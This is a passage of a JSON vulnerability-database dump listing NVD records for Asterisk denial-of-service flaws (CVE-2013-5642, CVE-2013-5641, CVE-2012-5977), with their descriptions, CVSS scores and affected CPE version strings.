"cpe:2.3:a:asterisk:open_source:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc1:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:14:22", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5642", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:10.12.1", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-5642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:14:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5641", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:39", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.", "cvss3": {}, "published": "2013-01-04T15:55:00", "type": "cve", "title": "CVE-2012-5977", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-02-02T05:10:00", "cpe": ["cpe:/a:digium:asterisk:1.8.2", "cpe:/a:digium:asterisk:10.5.1", "cpe:/a:digium:asterisk:1.8.3.2", "cpe:/a:digium:asterisk:1.8.2.4", "cpe:/a:digium:asterisk:10.5.2", "cpe:/a:digium:asterisk:10.3.1", "cpe:/a:digium:asterisk:10.7.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.3.3", "cpe:/a:digium:certified_asterisk:1.8.11", "cpe:/a:digium:asterisk:1.8.8.1", "cpe:/a:digium:asterisk:1.8.0", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:1.8.4", "cpe:/a:digium:asterisk:1.8.11.1", "cpe:/a:digium:asterisk:1.8.3.1", "cpe:/a:digium:asterisk:1.8.7.0", "cpe:/a:digium:asterisk:1.8.3", "cpe:/a:digium:asterisk:1.8.9.2", "cpe:/a:digium:asterisk:1.8.1.1", "cpe:/a:digium:asterisk:10.1.0", "cpe:/a:digium:asterisk:1.8.10.0", "cpe:/a:digium:asterisk:1.8.15.0", "cpe:/a:digium:asterisk:1.8.6.0", "cpe:/a:digium:asterisk:10.6.0", "cpe:/a:digium:asterisk:1.8.9.3", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:1.8.4.1", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:10.3.0", "cpe:/a:digium:asterisk:1.8.14.1", "cpe:/a:digium:asterisk:1.8.5", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:10.6.1", "cpe:/a:digium:asterisk:1.8.4.2", "cpe:/a:digium:asterisk:10.4.1", "cpe:/a:digium:asterisk:10.1.3", "cpe:/a:digium:asterisk:1.8.15.1", "cpe:/a:digium:asterisk:1.8.16.0", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.2.1", "cpe:/a:digium:asterisk:10.5.0", "cpe:/a:digium:asterisk:10.0.1", "cpe:/a:digium:asterisk:1.8.12", "cpe:/a:digium:asterisk:1.8.11.0", "cpe:/a:digium:asterisk:10.10.1", "cpe:/a:digium:asterisk:1.8.12.0", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:1.8.2.2", "cpe:/a:digium:asterisk:10.0.0", "cpe:/a:digium:asterisk:10.8.0", "cpe:/a:digium:asterisk:1.8.9.0", "cpe:/a:digium:asterisk:10.4.0", "cpe:/a:digium:asterisk:1.8.2.3", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:10.1.1", "cpe:/a:digium:asterisk:1.8.7.1", "cpe:/a:digium:asterisk:1.8.13.0", "cpe:/a:digium:asterisk:10.1.2", "cpe:/a:digium:asterisk:1.8.8.0", "cpe:/a:digium:asterisk:1.8.8.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:10.7.1", "cpe:/a:digium:asterisk:1.8.14.0", "cpe:/a:digium:asterisk:1.8.1", "cpe:/a:digium:asterisk:1.8.13.1", "cpe:/a:digium:asterisk:10.2.0", "cpe:/a:digium:asterisk:1.8.4.4", "cpe:/a:digium:asterisk:1.8.4.3", "cpe:/a:digium:asterisk:1.8.5.0", "cpe:/a:digium:asterisk:10.2.1", "cpe:/a:digium:asterisk:1.8.9.1", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:1.8.1.2", "cpe:/a:digium:asterisk:1.8.10.1", "cpe:/a:digium:asterisk:10.4.2", "cpe:/a:digium:asterisk:10.9.0", "cpe:/a:digium:asterisk:11.0.2"], "id": "CVE-2012-5977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*", 